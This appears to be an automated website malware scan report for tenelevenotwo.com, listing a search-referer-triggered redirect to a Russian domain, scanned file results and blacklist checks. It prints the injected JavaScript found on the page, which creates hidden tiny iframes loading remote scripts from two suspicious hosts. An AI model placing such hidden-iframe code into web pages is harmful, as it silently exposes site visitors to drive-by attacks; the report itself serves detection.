Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tenelevenotwo.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tenelevenotwo.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 18 Jun 2014 05:09:08 GMT Location: http://ypnofkiq.ru/count28.php Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tenelevenotwo.com/ | 200 OK Content-Length: 26693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var x = document.createElement('iframe'); x.src = 'http://ypnofkiq.ru/count28.php'; x.style.position = 'absolute'; x.style.border = '0'; x.style.height = '1px'; x.style.width = '1px'; x.style.left = '1px'; x.style.top = '1px'; if (!document.getElementById('x')) { document.write('<div id=\'x\'></div>'); document.getElementById('x').appendChild(x); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==n Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://mmpwxsvk.ce.ms/count14.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://mmpwxsvk.ce.ms/count14.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAtt <iframe src='http://mmpwxsvk.ce.ms/count14.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.cool79.com.tw/images/process.js | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://www.cool79.com.tw/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.sshi.com.cn/js/process.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://fossfotography.com/wp-content/uploads/process.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tenelevenotwo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tenelevenotwo.com/
Result: tenelevenotwo.com is not infected or malware details are not published yet.
Result: tenelevenotwo.com is not infected or malware details are not published yet.